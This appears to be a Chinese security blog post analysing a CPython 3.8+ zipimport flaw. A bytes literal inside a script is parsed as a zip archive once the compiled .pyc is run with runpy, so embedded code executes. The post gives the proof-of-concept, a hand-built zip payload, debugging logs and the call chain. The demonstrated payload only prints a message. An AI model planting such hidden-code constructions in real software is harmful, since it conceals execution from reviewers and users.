# Python zipimport 模块注入分析 ## 前言 刷推特的时候看到一段神奇的python代码[1] , 本文记录一下这个目前尚未修复的漏洞原理及调试时遇到的问题。 ## 漏洞分析 推特上给出的验证代码如下: ```python unused=b'\x50K\3\4'+b'\0'*26+b'+(\xca\xcc+\xd1P\xcfHL\xceNMQ\xc8\xc9\xcfQ\xd7\4\0PK\1\2'+b'\0'*6+b'\1'+b'\0'*9+b'\x15'+b'\0'*7+b'\13'+b'\0'*17+b'__\x6da\x69n__.\x70y\x50K\5\6'+b'\0'*8+b'9\0\0\0003\0\0\0' i=__import__ i("runpy").run_path(i("py_compile").compile(__file__)) ``` 此代码段的预期行为是将其自己的源文件编译为 .pyc 文件,然后运行该 pyc 文件。在python3.7下该代码会报错而在python3.8+下会输出`hacked lol`。很明显python3.8+中错误的将unuesed解析为bytecode并执行了。 生成的.pyc文件如下: ```bash $ xxd __pycache__/test.cpython-310.pyc 00000000: 6f0d 0d0a 0000 0000 e654 2164 1001 0000 o........T!d.... 00000010: e300 0000 0000 0000 0000 0000 0000 0000 ................ 00000020: 0005 0000 0040 0000 0073 2400 0000 6400 .....@...s$...d. 00000030: 5a00 6501 5a02 6502 6401 8301 a003 6502 Z.e.Z.e.d.....e. 00000040: 6402 8301 a004 6505 a101 a101 0100 6403 d.....e.......d. 00000050: 5300 2904 7380 0000 0050 4b03 0400 0000 S.).s....PK..... 00000060: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00000070: 0000 0000 0000 002b 28ca cc2b d150 cf48 .......+(..+.P.H 00000080: 4cce 4e4d 51c8 c9cf 51d7 0400 504b 0102 L.NMQ...Q...PK.. 00000090: 0000 0000 0000 0100 0000 0000 0000 0000 ................ 000000a0: 1500 0000 0000 0000 0b00 0000 0000 0000 ................ 000000b0: 0000 0000 0000 0000 0000 5f5f 6d61 696e ..........__main 000000c0: 5f5f 2e70 7950 4b05 0600 0000 0000 0000 __.pyPK......... 000000d0: 0039 0000 0033 0000 00da 0572 756e 7079 .9...3.....runpy 000000e0: da0a 7079 5f63 6f6d 7069 6c65 4e29 06da ..py_compileN).. 000000f0: 0675 6e75 7365 64da 0a5f 5f69 6d70 6f72 .unused..__impor 00000100: 745f 5fda 0169 da08 7275 6e5f 7061 7468 t__..i..run_path 00000110: da07 636f 6d70 696c 65da 085f 5f66 696c ..compile..__fil 00000120: 655f 5fa9 0072 0900 0000 7209 0000 00fa e__..r....r..... 00000130: 0774 6573 742e 7079 da08 3c6d 6f64 756c .test.py......s......... 00000150: 01 ``` 可见unused中有`PK\x03\x04\`的字段,熟悉文件格式的同学应该知道这是zip压缩文件的文件头标识。尝试用zlib解压: ```bash ─$ python3 Python 3.10.7 (main, Sep 8 2022, 14:34:29) [GCC 12.2.0] on linux Type "help", "copyright", "credits" or "license" for more information. >>> import zlib >>> zlib.decompress(b'+(\xca\xcc+\xd1P\xcfHL\xceNMQ\xc8\xc9\xcfQ\xd7\x04\x00',-15) b"print('hacked lol')" ``` 至此可以推测该漏洞的大致原理为错误的将pyc中的变量识别为压缩文件格式,将其解压后的数据作为代码执行。 很快有研究员[2] 定位了python解压zip文件的代码[3]。查看git历史可知,zipimport在python3.8被重写[4],这也是3.7不受影响的原因。 ## 漏洞调试 由于想调试一下该漏洞的调用链,一开始的思路是在unused里面直接用`traceback.print_stack()`。首先构造zip包,这里需要将你的目标脚本名称改为`__main__.py`后打包,否则在pyc解析执行时会因为找不到`__main__.py`报错;构造完成后转换格式直接替换原来poc里面unused值即可,不用像原poc中重新构造zip前30字节 : ```bash $ cat __main__.py import traceback traceback.print_stack() $ xxd -p 1.zip 504b030414000000080064537d5636685d6922000000290000000b000000 5f5f6d61696e5f5f2e7079cbcc2dc82f2a5128294a4c4e4d4a4ccee682b3 f40a8a32f34ae28b4b806c0d4d2e00504b01021f0014000000080064537d 5636685d6922000000290000000b00240000000000000020000000000000 005f5f6d61696e5f5f2e70790a00200000000000010018005990b3f5e561 d9015990b3f5e561d901ed69b3f5e561d901504b05060000000001000100 5d0000004b0000000000 $ python3 Python 3.10.7 (main, Sep 8 2022, 14:34:29) [GCC 12.2.0] on linux Type "help", "copyright", "credits" or "license" for more information. >>> test="504b030414000000080064537d5636685d6922000000290000000b0000005f5f6d61696e5f5f2e7079cbcc2dc82f2a5128294a4c4e4d4a4ccee682b3f40a8a32f34ae28b4b806c0d4d2e00504b01021f0014000000080064537d5636685d6922000000290000000b00240000000000000020000000000000005f5f6d61696e5f5f2e70790a00200000000000010018005990b3f5e561d9015990b3f5e561d901ed69b3f5e561d901504b050600000000010001005d0000004b0000000000" >>> print(bytes.fromhex(test)) b'PK\x03\x04\x14\x00\x00\x00\x08\x00dS}V6h]i"\x00\x00\x00)\x00\x00\x00\x0b\x00\x00\x00__main__.py\xcb\xcc-\xc8/*Q()JLNMJL\xce\xe6\x82\xb3\xf4\n\x8a2\xf3J\xe2\x8bK\x80l\rM.\x00PK\x01\x02\x1f\x00\x14\x00\x00\x00\x08\x00dS}V6h]i"\x00\x00\x00)\x00\x00\x00\x0b\x00$\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00__main__.py\n\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00Y\x90\xb3\xf5\xe5a\xd9\x01Y\x90\xb3\xf5\xe5a\xd9\x01\xedi\xb3\xf5\xe5a\xd9\x01PK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00]\x00\x00\x00K\x00\x00\x00\x00\x00' $ python3 ./test.py File "/mnt/d/./test.py", line 4, in i("runpy").run_path(i("py_compile").compile(__file__)) File "/usr/lib/python3.10/runpy.py", line 306, in run_path return _run_code(code, mod_globals, init_globals, File "/usr/lib/python3.10/runpy.py", line 86, in _run_code exec(code, run_globals) File "/mnt/d/./__pycache__/test.cpython-310.pyc/__main__.py", line 2, in ``` 打印出的调用栈并不符合预期,遂开始下载源码进行调试。 本次调试使用的cpython源码版本为3.8(3205d1fbbbfcf613b74d236be9db7a8225f452ea)。一开始在编译完成后想直接向zipimport.py中打log来进行调试,但无论如何修改zipimport.py甚至删除该文件都不会改变运行输出,python也无任何报错。搜索zipimport相关代码发现: ```bash ~/cpython$ head ./Python/importlib_zipimport.h /* Auto-generated by Programs/_freeze_importlib.c */ const unsigned char _Py_M__zipimport[] = { 99,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,4,0,0,0,64,0,0,0,115,82,1,0,0,100,0, ``` zipimport在编译前被序列化成bytecode,当前python的frozen module在frozen.c中定义: ```c //cpython/blob/3.8/Python/frozen.c#L31 static const struct _frozen _PyImport_FrozenModules[] = { /* importlib */ {"_frozen_importlib", _Py_M__importlib_bootstrap, (int)sizeof(_Py_M__importlib_bootstrap)}, {"_frozen_importlib_external", _Py_M__importlib_bootstrap_external, (int)sizeof(_Py_M__importlib_bootstrap_external)}, {"zipimport", _Py_M__zipimport, (int)sizeof(_Py_M__zipimport)}, /* Test module */ {"__hello__", M___hello__, SIZE}, /* Test package (negative size indicates package-ness) */ {"__phello__", M___hello__, -SIZE}, {"__phello__.spam", M___hello__, SIZE}, {0, 0, 0} /* sentinel */ }; ``` 因此在修改zipimort.py后使用命令 `make regen-importlib`需要重新打包。之后重新make后即可。 以下是在对zipimport.py、runpy.py等加log后的输出结果: ```bash $ ./python ../test.py in _read_directory in _read_directory in run_path importer: in util.find_spec fullname:__main__ in util.find_spec parent_path:None in get_filename in _get_module_code in _get_data File "../test.py", line 3, in i("runpy").run_path(i("py_compile").compile(__file__)) File "/home/fuzz/cpython/Lib/runpy.py", line 281, in run_path mod_name, mod_spec, code = _get_main_module_details() File "/home/fuzz/cpython/Lib/runpy.py", line 224, in _get_main_module_details return _get_module_details(main_name) File "/home/fuzz/cpython/Lib/runpy.py", line 133, in _get_module_details print("in get_module_details,spec:{spec},trace={trace}".format(spec=spec,trace=traceback.print_stack())) in get_module_details,spec:ModuleSpec(name='__main__', loader=, origin='../__pycache__/test.cpython-38.pyc/__main__.py'),trace=None in get_code in _get_module_code in _get_data hacked lol ``` 通过打印log,辅助gdb进行调试。加载gdb后加载源码目录下的`python-gdb.py`。之后可以用`py-*`的命令进行调试,如用`py-bt`查看当前位置python代码级调用栈。 大致调用栈如下: ``` //https://github.com/python/cpython/blob/3.8/ runpy.run_path(py_compile.compile(__file__)) importer = pkgutil.get_importer(path_name) //Lib/runpy.py#L255 importer = path_hook(path_item) //Lib/pkgutil.py#L420 zipimport.zipimporter.__init__(path_item) //Lib/zipimport.py#L63 files = _read_directory(path) //Lib/zipimport.py#L94 importer: mod_name, mod_spec, code = _get_main_module_details() //Lib/runpy.py#L278 spec = importlib.util.find_spec(mod_name) //Lib/runpy.py#L130 zipimport.get_filename() zipimport._get_module_code() code = loader.get_code(mod_name) //Lib/runpy.py#L155 code = zipimport._get_module_code(self, fullname) //Lib/zipimport.py#L698 data = zipimport._get_data(self.archive, toc_entry) //Lib/zipimport.py#L709 runpy.run_code(code,...) ``` ## 总结 通过这次调试增加了我对python源码调试的经验;从漏洞挖掘方面来讲在今后可以重点关注重写模块相关的代码,因为单次提交代码量大更容易出现bug。感谢四哥在这次调试中给我的帮助和指导,文后附四哥对该漏洞的分析[6]。 ## 参考链接 [1] https://twitter.com/David3141593/status/1640115094255198208 [2] https://twitter.com/c3rb3ru5d3d53c/status/1640191261435985920 [3] https://github.com/python/cpython/blob/d08fb257698e3475d6f69bb808211d39e344e5b2/Lib/zipimport.py#L544-L569 [4] https://github.com/python/cpython/commit/79d1c2e6c9d1bc1cf41ec3041801ca1a2b9a995b [5] https://github.com/python/cpython/issues/103051 [6] https://mp.weixin.qq.com/s/ss6Ty8DozrtTP0sM5XKdXw